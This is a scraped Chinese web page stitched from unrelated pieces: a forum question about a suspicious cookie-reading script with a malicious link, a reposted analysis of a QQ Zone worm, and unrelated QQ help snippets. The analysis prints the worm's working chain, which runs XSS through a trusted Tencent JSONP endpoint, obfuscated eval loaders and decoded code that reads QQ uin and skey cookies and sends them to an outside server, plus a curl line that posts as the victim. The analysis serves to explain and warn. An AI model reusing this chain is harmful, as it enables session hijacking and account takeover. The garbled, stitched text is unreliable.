& 2009- DV库生活百科|DV库百科问答|DV库知识问答 版权所有
友情链接：
本站提供的DV库生活百科_DV库百科问答_DV库知识问答_信息资源均搜自网络、与本站无关
版权归原作者所有问题估计不用过多描述了吧&br&朋友转发的已经删掉了 自己转发的还留着&br&贴上网址 非大神慎点&br&&a href=&///?target=http%3A//kriqj.ysroxwh.gwau.pw/view/3/%3Fid%3D2%2C0.1076497& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&kriqj.ysroxwh.gwau.pw/v&/span&&span class=&invisible&&iew/3/?id=2,0.1076497&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&以及 求解决方法!&br&贴上这个网站源代码中的一个.js 其中看到了cookie以及 ios android的字样 是用来盗取cookie的吗?&br&&a href=&///?target=http%3A//.%3A9781/b/c.js& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&.:9781&/span&&span class=&invisible&&/b/c.js&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&blockquote&&div class=&highlight&&&pre&&code class=&language-text&&var s_try{s_reffer=window.top.document.}catch(e){s_reffer=document.}
s_reffer = escape(s_reffer);
function get_c_b(Name)
{ var search = Name + &=& ;var returnvalue = &&; if (document.cookie.length & 0) { offset = document.cookie.indexOf(search);if (offset != -1) {offset += search.end = document.cookie.indexOf(&;&, offset); if (end == -1) end = document.cookie.returnvalue=unescape(document.cookie.substring(offset, end)) ;} } }
var browser = {
versions: function () {
var u = navigator.userAgent, app = navigator.appV
ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/),
android: u.indexOf('Android') & -1 || u.indexOf('Linux') & -1,
iPhone: u.indexOf('iPhone') & -1,
iPad: u.indexOf('iPad') & -1
var khdlx=0;
if (browser.versions.iPhone || browser.versions.iPad || browser.versions.ios) {khdlx=2}else{
if(browser.versions.android){khdlx=1}
}//if(sd_i==43){khdlx=2;}
var pWG_=pWG_+1||1;
if(pWG_==1){if(get_c_b(&C_P_i&)==&&){var Bi=1;var Bv=1;expires = new Date();
expires.setTime(expires.getTime()+600*60*1000) ;
document.cookie = &C_P_i='1';expires=&+expires.toGMTString() +
&; path=/;domain=&+location.hostname+&&;}else{var Bi=0;var Bv=1;}
else{var Bi=0;var Bv=0;}
var mw = window.innerWidth || document.documentElement.clientWidth || document.body.clientW
var mh = window.innerHeight || document.documentElement.clientHeight || document.body.clientH
if(mw&mh){mh2=mh=mw=mh2;}
//if(mw&580){mw=580}
mh=parseInt(3*mw/20);
document.write ('&script src=&.:9781/code/'+sd_i+'.asp?Bi='+Bi+'&Bv='+Bv+'&khd='+khdlx+'&
language=javascript charset=&gb2312&&&/script&');
function mbwh(){var w = window.innerWidth || document.documentElement.clientWidth || document.body.clientW
var h = window.innerHeight || document.documentElement.clientHeight || document.body.clientH
//if(w&580){w=580}
if(document.getElementById(&biGi&)){mbwh3(w);}else{setTimeout(mbwh,1000);}
function mbwh2(){mbwh();
var evt = &onorientationchange& in window ? &orientationchange& : &resize&;
window.addEventListener(evt,function(obj){
setTimeout(mbwh,500);
function mbwh3(w){
biGii=document.getElementById(&biGi&);
biGiihe=parseInt(3*w/20);
if(document.getElementById(&spbd&)){document.getElementById(&spbd&).style.paddingTop=40+&px&;}
&/code&&/pre&&/div&&/blockquote&
问题估计不用过多描述了吧朋友转发的已经删掉了 自己转发的还留着贴上网址 非大神慎点以及 求解决方法!贴上这个网站源代码中的一个.js 其中看到了cookie以及 ios android的字样 是用来盗取cookie的吗?var s_try{s_reffer=window.top.document.}catch(e){s_reffer=document.}
s_reffer = escape(s_reffer);
function get_c_b(Name)
{ var search = Name + "=" ;var returnvalue = ""; if (document.cookie.length & 0) { offset = document.cookie.indexOf(search);if (offset != -1) {offset += search.end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.returnvalue=unescape(document.cookie.substring(offset, end)) ;} } }
var browser = {
versions: function () {
var u = navigator.userAgent, app = navigator.appV
ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/),
android: u.indexOf('Android') & -1 || u.indexOf('Linux') & -1,
iPhone: u.indexOf('iPhone') & -1,
iPad: u.indexOf('iPad') & -1
var khdlx=0;
if (browser.versions.iPhone || browser.versions.iPad || browser.versions.ios) {khdlx=2}else{
if(browser.versions.android){khdlx=1}
}//if(sd_i==43){khdlx=2;}
var pWG_=pWG_+1||1;
if(pWG_==1){if(get_c_b("C_P_i")==""){var Bi=1;var Bv=1;expires = new Date();
expires.setTime(expires.getTime()+600*60*1000) ;
document.cookie = "C_P_i='1';expires="+expires.toGMTString() +
"; path=/;domain="+location.hostname+"";}else{var Bi=0;var Bv=1;}
else{var Bi=0;var Bv=0;}
var mw = window.innerWidth || document.documentElement.clientWidth || document.body.clientW
var mh = window.innerHeight || document.documentElement.clientHeight || document.body.clientH
if(mw&mh){mh2=mh=mw=mh2;}
//if(mw&580){mw=580}
mh=parseInt(3*mw/20);
document.write ('&script src=".:9781/code/'+sd_i+'.asp?Bi='+Bi+'&Bv='+Bv+'&khd='+khdlx+'"
language=javascript charset="gb2312"&&/script&');
function mbwh(){var w = window.innerWidth || document.documentElement.clientWidth || document.body.clientW
var h = window.innerHeight || document.documentElement.clientHeight || document.body.clientH
//if(w&580){w=580}
if(document.getElementById("biGi")){mbwh3(w);}else{setTimeout(mbwh,1000);}
function mbwh2(){mbwh();
var evt = "onorientationchange" in window ? "orientationchange" : "resize";
window.addEventListener(evt,function(obj){
setTimeout(mbwh,500);
function mbwh3(w){
biGii=document.getElementById("biGi");
biGiihe=parseInt(3*w/20);
if(document.getElementById("spbd")){document.getElementById("spbd").style.paddingTop=40+"px";}
搬运自有些很讨厌的带链接说说，只要你在手机打开它，就会自动转发，内容极其不雅一怒之下我决定看个究竟首先，在此页开头有此关键语句：1234&iframe src="name="s=document.createElement('script');document.body.appendChild(s);s.src='';" style="display:none"&&/iframe&&iframe … style=”display:none”表明了这是一个隐藏的窗口，src是一个精心构造的URL作为窗口的内容，窗口名name是一段脚本首先，浏览器会加载这是腾讯地图的 RealTime Bidding（实时竞价，RTB）API，会受到腾讯自己和杀软的信任，它的作用是返回这样的格式：#Your_Code_Here# && #Your_Code_Here#({“detail”:{“comp_list”:[{“city”:3,”comp_id”:1,”name”:”腾讯北分”}],”num”:1},”info”:{“error”:0,”type”:86}})腾讯北分，真是233到不行。看来北分在积极参与啊！于是&iframe& 里面出现这样一个东西：1&/script&&svg&&script&eval(window.name);// && &/script&&svg&&script&eval(window.name);//({"detail":{"comp_list":[{"city":3,"comp_id":1,"name":"腾讯北分"}],"num":1},"info":{"error":0,"type":86}})呵呵，这不是一个XSS（跨站点攻击脚本）吗！！！“&/script&&svg&”由于浏览器的容错性被忽视了，“//”大家都知道是注释，于是最终效果就是这个：eval(window.name);即eval(“s=document.createElement(‘script’);document.body.appendChild(s);s.src=’';”)eval作用是把字符串作为代码解析。s=document.createElement(‘script’);document.body.appendChild(s);会在文档结尾创建&script&&/script&标签，此标签内的代码会被执行标签内的代码变成了这个恶意脚本这个脚本是这样的：OlOlll=”(x)”;OllOlO=” String”;OlllOO=”tion”;OlOllO=”Code(x)}”;OllOOO=”Char”;OlllOl=”func”;OllllO=” l = “;OllOOl=”.from”;OllOll=”{return”;Olllll=”var”;eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)…………………………………………（略）特别长，特别费解，也是精心设计的！请注意Ol不是01，是英文字母，为了造成阅读困难。eval已经暴露了一切。来，我们一窥究竟！按照OlOlll=”(x)”;等等进行替换好，我们先解决第一部分，整理后如下：1234567891011OlOlll="(x)";OllOlO=" String";OlllOO="tion";OlOllO="Code(x)}";OllOOO="Char";OlllOl="func";OllllO=" l = ";OllOOl=".from";OllOll="{return";Olllll="var";eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);然后可以得出1eval("var l = function(x){return String.fromCharCode(x)}");好了，l是个函数，返回数字ascii码对应的字符，然后下面一段意图就非常显然了：1eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+l(40)+l(77)+l(97)+l(116)+l(104)+l(46)+l(102)+l(108)+l(111)+l(111)+l(114)+l(40)+l(109)+l(47)+l(49)+l(48)+l(48)+l(48)+l(48)+l(41)+l(47)+l(57)+l(57)+l(41)+l(59)+l(125));解析后得到1eval("O=function(m){return String.fromCharCode(Math.floor(m/10000)/99);}");呵呵，函数O这是要玩大的数啊！！！下面的非常可怕，不过可以用调试得出答案eval(“”+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()++O。。。（实在太长了）解析排版，删去干扰字符得到后得到:123456789101112131415161718192021function getGTK(str) { var hash = 5381;for (var i = 0, len = str. i & ++i) { hash += (hash && 5) + str.charAt(i).charCodeAt();}return hash & 0x7}function getCookie(name) {var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)");if (arr = document.cookie.match(reg)) return unescape(arr[2]);}var q=parseInt(getCookie("uin").replace("o", ""));var k=getCookie("skey");var oHead = document.getElementsByTagName('HEAD').item(0);var toscript = document.createElement("script");toscript.type = "text/javascript";toscript.src = ""+q+"&s="+k+"&g="+getGTK(k)+"&t=3";oHead.appendChild(toscript);TMD！！！还没有结束！！！继续战斗！！！Cookie是一类数据，由网站生成，涉及用户的关键、动态信息（比如判断用户是否登陆）我进入QQ空间后，Cookie为uin=o; skey=@Gxkiad0xM;uin显然为O+我的QQ号，skey是个关键临时密码，（我重登后就过期了，所以不用试！）getCookie(name)函数用于获取我的CookiegetGTK(str)是为了给skey签名,这样可以确保skey是有效的然后这段代码会在网页里面产生如下脚本并执行：1&script src="" /&其实就是执行那个链接，把你的skey交给服务器。然后，一切结束了。因为skey功能是这样的：“skey权限代码，也就是说如果可以获得一个QQ号码的Skey代码，也就相应的拿到了对方QQ登陆和管理权限，这意味着你完全可以以主人的身份分分钟进入对方的空间、查看加密的相册，甚至发表说说，删除留言…”QQ号+skey就有了一切！服务器自动替你发说说！！！比如只要1curl "" -H "Host: user." (略去一些数据) -H "Referer: " -H "Cookie:uin=o########; skey=*******;" --data "说说内容"然后就有一条说说出现在你的空间里面！你输了！！！唯一解决方法就是退出空间（手机需要退出QQ），重新登陆QQ，这样会产生新的skey，原来的skey就无效了.刷新网页，或者关掉手机QQ空间，不会改变skeyTencent空间使用了各种方法来保护skey，但是防不住如此的伪装。另外腾讯北分为此做了重大贡献！战斗已经结束，好久没有这么精彩的一遭了.各位晚安！望引以为戒！庄思源
2:00 @ USTC
已有帐号？
无法登录？
社交帐号登录在线检测解决QQ空间异常限制 发不了说说无法评论等 秒解决 | 在线,检测,解决,空间,异常,限制,不了,说说,无法,评论_QQ空间_滕州生活网
|||||||||||||||||||
在线检测解决QQ空间异常限制 发不了说说无法评论等 秒解决
来源：互联网 发布时间：
摘要：相信很多人都有遇到过空间莫名其妙忽然就被限制，发不了说说、无法评论等。那么怎么办呢？下面小编就为大家介绍在线检测解决QQ空间异常限制方法，一起来学习，来看看吧！ 检测网址：/touch/qzone/qzone_status.html#from_ 由
在线检测解决QQ空间异常限制 发不了说说无法评论等 秒解决
& & & & 相信很多人都有遇到过空间莫名其妙忽然就被限制，发不了说说、无法评论等。那么怎么办呢？下面小编就为大家介绍在线检测解决QQ空间异常限制方法，一起来学习，来看看吧！
检测网址：/touch/qzone/qzone_status.html#from_
由于小编空间一切正常，就不给大家测试了，大家空间有问题的可以试试哈！ 滕州生活网
& & & & & & & & & & & & &检测时 & & & & & & & & & & & & & & & & & & & & & & & & & &检测后 滕州生活网()
& & & & 滕州生活网
补充一点：此网址仅适用于 发不了说说，或者带不了图片的说说 &具体大家可以测试。 滕州生活网
以上就是在线检测解决QQ空间异常限制的方法介绍，一起来看看吧！
相关阅读：
声明：凡注明为"网络整理"或者其他媒体来源的信息，均为转载自其他各大门户媒体，虽经严格筛选难免疏漏，转载目的在于传递更多信息，并不代表本网赞同其观点和对其真实性负责。您若对该稿件内容有任何疑问或者侵犯到您的权益，请发邮件至邮，我们将在24小时内予以删除。
下一篇：没有了
在线检测解决QQ空间异常限制 发不了说说无法评论等 秒解决
在线检测解决QQ空间异常限制 发不了说说无法评论等 秒解决我的QQ空间最近老被别人转发一些不良图片和信息，还被改了名字，请问该如何解决_百度知道
我的QQ空间最近老被别人转发一些不良图片和信息，还被改了名字，请问该如何解决
提问者采纳
是号码中毒、祝愉快、 修改密码和密保即可你好
其他类似问题
为您推荐：
qq空间的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁